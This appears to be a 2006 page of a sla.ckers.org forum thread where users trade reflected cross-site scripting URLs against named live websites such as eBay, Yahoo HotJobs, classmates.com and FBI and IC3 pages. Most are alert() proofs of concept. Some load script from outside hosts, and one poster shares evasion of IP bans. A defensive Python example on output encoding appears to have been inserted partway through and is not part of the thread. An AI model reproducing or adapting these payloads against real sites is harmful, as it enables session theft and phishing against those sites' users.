Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 31 of 65
Re: So it begins
Posted by: Ghozt
Date: November 22, 2006 03:52PM

WhiteAcid Wrote:
-------------------------------------------------------
> Here's one I enjoyed.
> I was searching for a specific post in this thread
> until I came across this one:
> http://cccure.org/modules.php?myh_op=show_all%3Csc
> ript%3Ealert(2)%3C/script%3E (well... it was
> something like that). That flaw has been fixed and
> they now have an error page. That error page has
> the user agent printed on it, using the flash and
> IE thing that was written about ages ago we can
> once again abuse this.
> http://www.whiteacid.org/misc/xss_headers.php?xss_
> target=http://cccure.org/modules.php?myh_op=show_a
> llalert(1)

I can't test that because it says "target = undefined" in Firefox, but if that's a widespread vulnerability in banned NukeSentinel pages, then you just took away the little bit of protection PHP-Nuke has. Oh well, you can still bypass Sentinel with "><script src=http://malicous.com/blah.jpg(js) .

Re: So it begins
Posted by: WhiteAcid
Date: November 22, 2006 04:12PM

It'll only work in IE. I've tried the flaw on phpnuke.org, but they have a different error page. On the other hand phpnuke-nederland.com does have the same error page which can also be exploited.
phpnuke-nederland.com: http://www.whiteacid.org/misc/xss_headers.php?xss_target=http://www.phpnuke-nederland.com/?myh_op=show_all%3Cscript%3Ealert(1)%3C/script%3E&User-agent=%3Cscript%3Ealert(1)%3C/script%3E

Note that NukeSentinel can optionally be set to ban your IP (?) from that site for some time. I'm now banned from phpnuke-nederland.com permanently. Good thing I wasn't using my home network, and a good thing my home network's IP is dynamic in case I want to go back for more later.

Edit: because of how it automatically bans your IP like that, you could cause havoc on their site by doing

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 3 time(s). Last edit at 11/22/2006 04:46PM by WhiteAcid.

Re: So it begins
Posted by: unsticky
Date: November 23, 2006 08:29AM

https://www.aa.com/apps/redirect/AACruises.jhtml?path=%0D%0A%0A%0D%3Cscript%3Ealert('xss');%3C/script%3Ehttp://
http://dodgeit.com/run/checkmail?mailbox=%3Cimg%20src=a%20onerror=alert('xss')%3E



Edited 1 time(s). Last edit at 11/23/2006 01:26PM by unsticky.

Re: So it begins
Posted by: nemessis
Date: November 24, 2006 05:07AM

ca.hotjobs.yahoo.com/jobseeker/jobsearch/search_results.html?keywords_all=names&kw=nemessis"><script>alert('XSS')</script>

Click on the "Tell us what you think" link (at the bottom of the page).

Re: So it begins
Posted by: Spikeman
Date: November 24, 2006 05:23AM

Didn't work for me.

nemessis Wrote:
-------------------------------------------------------
> ca.hotjobs.yahoo.com/jobseeker/jobsearch/search_re
> sults.html?keywords_all=names&kw=nemessis">alert('
> XSS')
>
> Click on the "Tell us what you think" link (at the
> bottom of the page).

Re: So it begins
Posted by: nemessis
Date: November 24, 2006 05:30AM

It works only with the IE browser, and you must click on "Tell us what you think" at the bottom of the page.



Edited 1 time(s). Last edit at 11/24/2006 05:31AM by nemessis.

Re: So it begins
Posted by: Spikeman
Date: November 24, 2006 05:34AM

Nice, it worked in IE.

Is this the right place to post something like this?

http://www.lemon64.com/giana/

Click on guestbook. Or use this direct link:

http://www.lemon64.com/giana/guestbook.php?action=view

Re: So it begins
Posted by: maluc
Date: November 25, 2006 12:15PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.securitypronews.com/submit.php&realname=asdf%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx securitypronews.com

-maluc

Re: So it begins
Posted by: rsnake
Date: November 25, 2006 01:56PM

Hm. That _is_ security news. ;)

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: jungsonn
Date: November 26, 2006 03:18AM

No XSS, still funny though:
there might be holes, but I'm too lazy now, sorry.

http://www.airfrance.us/cgi-bin/AF/US/en/local/include/initJsp.do?BV_SessionID=@@@@0725379830.1164531528@@@@&BV_EngineID=ccccaddjhfmmgdlcefecekedfnfdfoj.0

Re: So it begins
Posted by: kefka
Date: November 26, 2006 04:50AM

http://bsdvault.net/search.php?query=%22%3E%3CSCRIPT%3Ealert%28%22kefka%20was%20here%22%29%3C%2FSCRIPT%3E

Re: So it begins
Posted by: jungsonn
Date: November 26, 2006 03:16PM

Have one on me:


http://www.philipmorrisusa.com/en/search/search.asp?criteria=%22%3E%3Cscript%3Ealert%28%27%7C%5F%5F%7C%5F%5F%5F%5F%5F%5F%5F%5F%5F%5F%5F%5F%7C%7C%7C%7C%7E%7E+Up+in+SmOkE%27%29%3B%3C%2Fscript%3E%3C%22&code=noResultsFound



Edited 1 time(s). Last edit at 11/26/2006 03:22PM by jungsonn.

Re: So it begins
Posted by: rsnake
Date: November 26, 2006 11:36PM

https://secure.customersvc.com/wes/servlet/Show?MSRSMAG=HA&WESTRANSITION=TRUE&PRIVACYLINK=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&NEWLINK=http%3A%2F%2Fsubs.timeinc.net%2FCampaignHandler%2FHAnb%3Fsource_id%3D8&GIFTLINK=http%3A%2F%2Fsubs.timeinc.net%2FCampaignHandler%2FHAdnr%3Fsource_id%3D3&PUBLISHER=SPC&CUSTSERVLINK=www.health.com%2Fcustomerservice&RENEWLINK=%2Fservlet%2FShow%3FWESPAGE%3Dam%2FTransactions%2FRenewal%2Frenewal.jsp%26TR%3DREN&WESJSP=T&WESTCCJSP=T&WESRENEWIMAGEDIR=%2Fwes%2FV5%2Fp01a%2Flib%2FinstalledApps%2FAMWebEAR.ear%2FAMWeb.war%2F%2Fimages%2Frenew&WESTCCIMAGEDIR=%2Fwes%2FV5%2Fp01a%2Flib%2FinstalledApps%2FAMWebEAR.ear%2FAMWeb.war%2F%2Fimages%2Ftcc&WESRENEWINCENTIVEDIR=%2Fwes%2FV5%2Fp01a%2Flib%2FinstalledApps%2FAMWebEAR.ear%2FAMWeb.war%2F%2Fam_ren%2Frenewal%2Foffers&WESRENEWINCENTIVEDIRTHANKS=%2Fwes%2FV5%2Fp01a%2Flib%2FinstalledApps%2FAMWebEAR.ear%2FAMWeb.war%2F%2Fam_ren%2Frenewal%2Foffers&WESERRORPAGE=am%2FServices%2Ferror.jsp&WESSTATEPAGE=am%2FState%2FTransactions%2Fload_home.txt&x=37&y=10

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: November 26, 2006 11:45PM

http://www.classmates.com/registration/city.jsp?cType=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&overseas=false&canada=false&sId=1&state=Ohio&cLetter=Y

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: November 27, 2006 02:24AM

http://www.hellboundhackers.org/index.php?asdf'onclick=alert(String.fromCharCode(88,83,83))// requires victim to click the ShoutBox in the bottom-right

-maluc

Re: So it begins
Posted by: maluc
Date: November 28, 2006 12:33AM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.caterham.co.uk/register/sales.php&title=&first=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx&last=&country=UNITED+KINGDOM&othercountry=&tel=&email=&add1=&add2=&add3=&add4=&town=&postcode=&passwd1=&passwd2=&submit=Submit caterham.co.uk, the guys who make the ever-so-sexy Super Seven

-maluc

Re: So it begins
Posted by: jungsonn
Date: November 28, 2006 01:26AM

http://www.gmc.com/vehiclelocator/gmc/locatevehicle.jsp?year=2007&modelId=none&mmc=none&brand=&originatingBrand=%22%3E%3Cscript%3Ealert('XSS');%3C/script%3E

Re: So it begins
Posted by: lpilorz
Date: November 28, 2006 10:06AM

Three main auction sites in Poland:

Allegro
https://ssl.allegro.pl/help.php?tid=%22%3E%3Cscript%3Edocument.write(String.fromCharCode(60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,115,108,97,46,99,107,101,114,115,46,111,114,103,34,62,115,108,97,46,99,107,101,114,115,46,111,114,103,60,47,97,62))%3C/script%3E%3Cnoscript%3E

Swistak
http://www.swistak.pl/haslo.html?e=s1&what=%3Cscript%20src=http://ckers.org/s%3E%3C/script%3E

eBay
answercenter.ebay.pl/thread.jspa?threadID=1000000000&tstart=0&mod=';}alert('make_it_e.g._eval(String.fromCharCode(...))');{a='
//the same works for eBay.com:
answercenter.ebay.com/thread.jspa?threadID=1000033869&tstart=3&mod=';}alert('make_it_e.g._eval(String.fromCharCode(...))');{a='

Thanks, Maluc, but I gave up trying to make it a valid link and still working as an XSS ;)



Edited 3 time(s). Last edit at 11/28/2006 06:06PM by lpilorz.

Re: So it begins
Posted by: rsnake
Date: November 28, 2006 04:22PM

We will, we will http://www53.rockyou.com/search_main.php?s_tsearch=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&p=1

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: November 28, 2006 04:52PM

lpil, you'll have to URL-encode things to not break out of the link. If that doesn't work, try using
[ u r l = blah ]link name[ / u r l ] (without the spaces)

Not everything needs to be encoded, but always:
spaces to %20
" to %22
{ to %7B
} to %7D

Then sometimes these:
( to %28
) to %29
; to %3B
= to %3D

Your example one, without the million spaces, would be
http://answercenter.ebay.pl/thread.jspa?secure%20%20%20%20';%7Dalert('make_it_e.g._eval(String.fromCharCode(...))');%7Ba='%20&threadID=1000000000&tstart=0&mod=

I'd love to take a look at the code that causes these side effects ^^ (everything but space and " could likely be avoided)

-maluc

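The eBay entries above land inside a JavaScript string literal (the ';} breakout), most of the others land inside a quoted attribute or the page body, and maluc asks what code causes these side effects. As a defender's illustration, added here and not code from any poster or site, this Python puts a hypothetical template of that shape beside the same template with per-context output encoding; the template and the sample inputs are constructed, not taken from any live site.

```python
import html
import json

# Constructed sample inputs, shaped like the reflections posted in this thread
# (a quoted-attribute breakout, a JS-string breakout and a reflected header);
# they are not taken from any live site.
ATTR_BREAKOUT = '"><script>alert("XSS")</script>'
JS_BREAKOUT = "';}alert('XSS');{a='"
UA_BREAKOUT = "<script>alert(1)</script>"


def js_string_literal(value):
    """Encode a value as a JS string literal that cannot end the string or the
    enclosing <script> block: json.dumps quotes it and escapes " and backslash,
    and the extra replacements remove the raw '<' and '/' that '</script>' needs."""
    return json.dumps(value).replace("<", "\\u003c").replace("/", "\\/")


def render_unsafe(query, js_param, user_agent):
    """Hypothetical template of the kind behind the reflections above: raw
    interpolation into a quoted attribute, a JS string literal and the body."""
    return (
        f'<input name="kw" value="{query}">\n'
        f"<script>var mod='{js_param}';</script>\n"
        f"<p>Your browser: {user_agent}</p>"
    )


def render_safe(query, js_param, user_agent):
    """Same template, with an encoder chosen for each output context."""
    return (
        f'<input name="kw" value="{html.escape(query, quote=True)}">\n'
        f"<script>var mod={js_string_literal(js_param)};</script>\n"
        f"<p>Your browser: {html.escape(user_agent)}</p>"
    )


def script_tag_count(page):
    """Number of <script tags in the rendered page; the template itself has one."""
    return page.lower().count("<script")


if __name__ == "__main__":
    for name, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        page = render(ATTR_BREAKOUT, JS_BREAKOUT, UA_BREAKOUT)
        print(f"--- {name}: {script_tag_count(page)} <script tag(s) ---\n{page}\n")
```

The unsafe rendering ends up with three script tags (the template's own plus two injected ones) while the safe rendering keeps only the template's, and the JS-string payload becomes an inert literal instead of a closed string followed by code.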
Re: So it begins
Posted by: maluc
Date: November 29, 2006 01:52AM

Good find on the eBay one. They're actually pretty tricky to find ones in; it took me a good hour before I had found one _-_

About 30 times better than most ^^

-maluc

Re: So it begins
Posted by: kane_666
Date: November 29, 2006 03:06AM

Hey, this is my first post on these forums, although I've been around for quite some time. Firstly, I just want to say great work; this forum is very informative. Now, to get back on topic, here's an XSS I found on PodZinger.

http://hak5.podzinger.com/results.jsp?filter=0&q=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&s=PZSID_videopods_videopod0_3_7_0003&s=PZSID_pods_pod3_3_1_0007&col=en-all-pod-ep

Re: So it begins
Posted by: maluc
Date: November 29, 2006 05:59AM

Ironically, the FBI's form to 'Get e-mail updates when new scams and warnings are posted here':

http://service.govdelivery.com/service/action/authenticate?function=login&origin=&caller=subscribe.html&code=USFBI_11&partner_id=4617&category_id=&document_id=80035&edition_id=&format=&date=&time=&cookie_check=true&refreshOpener=&nextPage=&login=Mueller%20is%20watching%20You.%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx&button=Go&mailsender=default

Don't scam people with it.

-maluc

Re: So it begins
Posted by: maluc
Date: November 29, 2006 06:01AM

Internet Crime Complaint Center

http://www.ic3.gov/search.aspx?q=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

Re: So it begins
Posted by: maluc
Date: November 29, 2006 06:10AM

National White Collar Crime Center

http://www.nw3c.org/%3Cbody%20onload=alert(%22XSS%22)%3E.cfm (appending the .cfm is required).
Some referrer spoofing should work too.

-maluc

Re: So it begins
Posted by: Judiketty
Date: November 29, 2006 05:04PM

Well, that is really an adequate place here to talk about the topic. It is very valuable and considerable, and useful either in my eye, so thank you, man! Wish you nice days every day there!^_^

Re: So it begins
Posted by: Judiketty
Date: November 29, 2006 05:10PM

WhiteAcid Wrote:
-------------------------------------------------------
> http://www.marketwatch.com/tools/marketsummary/def
> ault.asp?siteid=mktw%22%0aalert(%22asd%22)//
> http://www.goldburse.com/> http://www.whiteacid.org/misc/xss_post_forwarder.p
> hp?xss_target=http://www.arto.com/brugere/login/de
> fault.asp?visopret=%26fc=0&destination=&returnUrl=
> &action=submit&brugernavn=%22%3E%3Cscript%3Ealert(
> 'xss')%3C/script%3E&kodeord=&xss_note=Basic%20XSS%
> 20in%20the%20username%20field (using POST -
> actually arto.com)
Well, but I think the answer looks so brilliant and considerable! That is great!^_^

Re: So it begins
Posted by: rsnake
Date: November 29, 2006 08:43PM

https://search.putnam.com/search/perform?g_siteName=--%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&g_queryText=%22%3Easdf

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: November 29, 2006 08:53PM

http://www.ezinedirector.com/subscriber/index.cfm?fuseaction=s&ezineId=956605769&email=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: November 29, 2006 09:16PM

http://www.corpwatch.org/search.php?q=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&Search=Submit+Query

- RSnake
Gotta love it. http://ha.ckers.org
